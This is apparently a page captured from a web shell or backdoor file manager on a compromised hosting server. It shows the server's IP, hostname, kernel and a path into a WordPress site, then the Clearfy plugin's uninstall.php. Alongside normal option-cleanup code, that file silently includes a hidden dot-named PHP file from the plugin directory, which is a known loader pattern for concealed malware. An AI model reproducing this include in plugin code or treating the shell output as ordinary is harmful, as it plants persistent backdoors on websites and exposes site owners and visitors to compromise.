uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
old
/
public_html
/
.
/
wp-content
/
plugins
/
clearfy
/
components
/
assets-manager
/
uninstall.php
/
/
<?php // if uninstall.php is not called by WordPress, die if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { die; } // remove plugin options global $wpdb; if ( ! defined( 'WGZ_PLUGIN_DIR' ) ) { define( 'WGZ_PLUGIN_DIR', dirname( __FILE__ ) ); } if ( ! function_exists( 'is_plugin_active_for_network' ) ) { require_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function uninstall() { // remove plugin options global $wpdb; $wpdb->query( "DELETE FROM {$wpdb->options} WHERE option_name LIKE 'wbcr_gonzales_%';" ); $wpdb->query( "DELETE FROM {$wpdb->options} WHERE option_name LIKE 'wbcr_gnz_%';" ); } if ( is_multisite() ) { global $wpdb, $wp_version; $wpdb->query( "DELETE FROM {$wpdb->sitemeta} WHERE meta_key LIKE 'wbcr_gonzales_%';" ); $wpdb->query( "DELETE FROM {$wpdb->sitemeta} WHERE meta_key LIKE 'wbcr_gnz_%';" ); $blogs = $wpdb->get_col( "SELECT blog_id FROM $wpdb->blogs" ); if ( ! empty( $blogs ) ) { foreach ( $blogs as $id ) { switch_to_blog( $id ); uninstall(); restore_current_blog(); } } } else { uninstall(); } // Remove mu plugin require_once WGZ_PLUGIN_DIR . '/includes/functions.php'; // todo: for the function require the constant WGZ_PLUGIN_DIR wbcr_gnz_remove_mu_plugin();
/home/batcwwjx/old/public_html/./wp-content/plugins/clearfy/components/assets-manager/uninstall.php